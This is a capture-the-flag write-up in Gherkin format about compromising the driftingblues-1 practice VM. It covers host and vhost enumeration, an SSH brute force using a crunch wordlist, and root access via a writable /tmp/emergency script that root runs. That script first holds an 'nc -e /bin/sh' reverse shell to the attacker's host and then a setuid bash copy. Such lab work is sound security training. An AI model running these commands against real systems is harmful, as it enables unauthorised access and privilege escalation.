## Version 1.4.1
## language: en

Feature:
  TOE:
    driftingblues-1
  Category:
    Improper Restriction of Communication Channel to Intended Endpoints
  Location:
    http://test.driftingblues.box/ssh_cred.txt
  CWE:
    CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action
  Rule:
    REQ.356: https://fluidattacks.com/products/rules/list/356
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better disable sub-domains which aren't used

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | Nmap                       | 7.91     |
    | Gobuster                   | 3.0.1    |
    | Burp Suit Community Edition| 2021.2.1 |
    | Medusa                     | 2.2      |
    | crunch                     | 3.6      |
    | SearchSploit               | 3.8.3    |
    | stegcracker                | 2.1.0    |
    | netcat                     | 1.10     |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on virtualbox
    Then I saw that the machine was running ubuntu 16.04.7 [evidence](01.png)
    When I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet8
    """
    Then I got the next result
    """
    vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
    inet 192.168.103.1/29 brd 192.168.103.7 scope global vmnet8
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:8/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 192.168.103.0/29
    """
    Then I got the next result
    """
    Nmap scan report for 192.168.103.1
    Host is up (0.0025s latency).
    Nmap scan report for 192.168.103.5
    Host is up (0.0012s latency).
    """
    Then I knew that 192.168.103.5 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -p- -A -sV 192.168.103.5
    """
    And I got the next result
    """
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux;
    protocol 2.0)
    | ssh-hostkey:
    |   2048 ca:e6:d1:1f:27:f2:62:98:ef:bf:e4:38:b5:f1:67:77 (RSA)
    |   256 a8:58:99:99:f6:81:c4:c2:b4:da:44:da:9b:f3:b8:9b (ECDSA)
    |_  256 39:5b:55:2a:79:ed:c3:bf:f5:16:fd:bd:61:29:2a:b7 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Drifting Blues Tech
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that port 80 was used by HTTP with Apache in its version 2.4.18
    And SSH was using openSSH in its version 7.2 on port 22

  Scenario: Normal use case
    Given HTTP was working on port 80
    When I accessed to the main webpage on 192.168.103.5:80 using browser
    Then there I saw the following web site [evidence](02.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I decided to search possible hidden directories with gobuster
    And I got the following result
    """
    ===============================================================
    2021/04/05 15:03:50 Starting gobuster in directory enumeration mode
    ===============================================================
    /js          (Status: 301) [Size: 311] [--> http://192.168.103.5/js/]
    /index.html  (Status: 200) [Size: 7710]
    /css         (Status: 301) [Size: 312] [--> http://192.168.103.5/css/]
    /img         (Status: 301) [Size: 312] [--> http://192.168.103.5/img/]
    /.           (Status: 200) [Size: 7710]
    /secret.html (Status: 200) [Size: 25]
    ===============================================================
    2021/04/05 15:04:36 Finished
    ===============================================================
    """
    Then I entered to the js directory
    But I didn't find any relevant
    Then I accessed to the css directory
    But I didn't find any hint
    When I inspected img directory
    Then there I saw some pictures
    And I downloaded those images
    Then I analyzed each of them with stegcracker
    But I didn't find anything
    When I checked the secret.html file
    Then I found the following message [evidence](03.png)
    And I inspected the main webpage one more time
    And thus I realized that there was a from [evidence](04.png)
    Then I tried sending some parameters
    But none of them worked
    When I analyzed that form using burp suit
    Then I found out a comment which was encoded in base64 [evidence](05.png)
    And I inspected that file
    And there I found a strange message which can see in [evidence](06.png)
    Then I searched on internet about message codification
    And thus I realized that it was encoded in Ook!
    And I decoded the message using the following website
    """
    https://www.splitbrain.org/_static/ook/
    """
    And in that way I could see the message below
    """
    my man, i know you are new but you should know how to use host file to
    reach our secret location. -eric
    """
    When I analyzed the email accounts in the main webpage
    Then I could determine the domain [evidence](07.png)
    And I modified my host file with the next sentence
    """
    192.168.103.5   driftingblues.box
    """
    When I used gobuster again to find out hidden domains
    Then I got the following results
    """
    ===============================================================
    2021/04/05 18:38:02 Starting gobuster in VHOST enumeration mode
    ===============================================================
    Found: test.driftingblues.box (Status: 200) [Size: 24]
    Found: *.driftingblues.box (Status: 400) [Size: 430]
    ===============================================================
    2021/04/05 18:38:48 Finished
    ===============================================================
    """
    And I added those sub-domains to my host file in the way below
    """
    192.168.103.5 driftingblues.box test.driftingblues.box *.driftingblues.box
    """
    When I accessed to the first sub-domain
    Then I looked the next message [evidence](08.png)
    Then I entered to the second domain
    But it didn't work
    When I scanned test.driftingblues.box with gobuster to find hidden files
    Then I discovered the files below
    """
    ===============================================================
    2021/04/05 18:47:26 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html           (Status: 200) [Size: 24]
    /robots.txt           (Status: 200) [Size: 125]
    ===============================================================
    2021/04/05 18:48:02 Finished
    ===============================================================
    """
    Then I inspected robots.txt file
    And there I found the following hidden files
    """
    Disallow: /ssh_cred.txt
    Allow: /never
    Allow: /never/gonna
    Allow: /never/gonna/give
    Allow: /never/gonna/give/up
    """
    When I examined ssh_cred.txt file
    Then I saw the message below
    """
    we can use ssh password in case of emergency. it was "1mw4ckyyucky".
    sheryl once told me that she added a number to the end of the password.
    -db
    """
    And I generated a word list using crunch with the command below
    """
    crunch 13 13 -t 1mw4ckyyucky% -o list.txt
    """
    Then I used that wordlist to do a brute force attack with Medusa
    And thus I could find the password for eric user [evidence](09.png)
    And I connected through SSH with those credentials

  Scenario: Exploitation
    Given previously I'd found the password to log me through SSH
    When I logged using that password and the eric user
    Then I accessed to the target system successfully [evidence](10.png)
    And I listed the files in the user home directory
    """
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Desktop
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Documents
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Downloads
    -rw-r--r-- 1 eric eric 8980 Ara 10 23:59 examples.desktop
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Music
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Pictures
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Public
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Templates
    -rw-rw-r-- 1 eric eric 1801 Ara 11 16:52 user.txt
    drwxr-xr-x 2 eric eric 4096 Ara 11 13:01 Videos
    """
    When I visualized user.txt file
    Then I found the first flag [evidence](11.png)
    When I inspected if I could execute sudo command
    """
    [sudo] password for eric:
    Sorry, user eric may not run sudo on driftingblues.
    """
    Then I searched information about kernel
    """
    Linux driftingblues 4.15.0-123-generic #126~16.04.1-Ubuntu SMP Wed Oct 21
    13:48:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
    """
    And I searched an exploit using searchsploit
    """
    ----------------------------------------------------------------------
    Exploit Title                                   |  Path
    -------------------------- --------------------- ---------------------
    Linux Kernel 4.15.x < 4.19 Privilege Escalation | linux/local/47164.sh
    Linux Kernel 4.15.x < 4.19 Privilege Escalation | linux/local/47165.sh
    Linux Kernel 4.15.x < 4.19 Privilege Escalation | linux/local/47166.sh
    Linux Kernel 4.15.x < 4.19 Privilege Escalation | linux/local/47167.sh
    """
    Then I tried with all of them
    But none of those exploits worked
    When I searched files which had the root user as owner
    Then I could execute or modify them
    And I found the file below
    """
    -r--r--r-x 1 root root 123 Ara 11 16:35 /var/backups/backup.sh
    -rwxr-xr-x 1 root root 1513 Eki 20  2013 /usr/share/doc/libipc-system-simpl
    e-perl/examples/rsync-backup.pl
    """
    Then I inspected the backup.sh file
    And there I saw the next script
    """
    #!/bin/bash
    /usr/bin/zip -r -0 /tmp/backup.zip /var/www/
    /bin/chmod
    #having a backdoor would be nice
    sudo /tmp/emergency
    """
    Then I created the emergency file in the tmp directory
    And I added the command below to that file
    """
    nc -e /bin/sh 192.168.103.1 1234
    """
    Then I put port 1234 in listening mode
    But I didn't get remote connection
    Then I modified /tmp/emergency file with the commands below
    """
    cp /bin/bash /tmp/shell; chmod +s /tmp/shell
    """
    And thus when emergency file was executed by the root user
    And the root user added a setuid permission to the /tmp/shell file
    And the /tmp/shell file was generated
    And I executed that file
    And thus I got the root privileges [evidence](12.png)
    When I listed files in the root directory
    Then I visualized the second flag
    And thus I solved the challenge[evidence](13.png)

  Scenario: Remediation
    Given that some sub-domains are enabled and available to the public
    And the source code in the main webpage has some comments
    And the system has a backdoor
    Then it'd better avoid enabling sub-domains without any restriction
    And avoid putting comments in the source code
    And disable any backdoor in the system

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.9/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.7/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.6/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-04-06
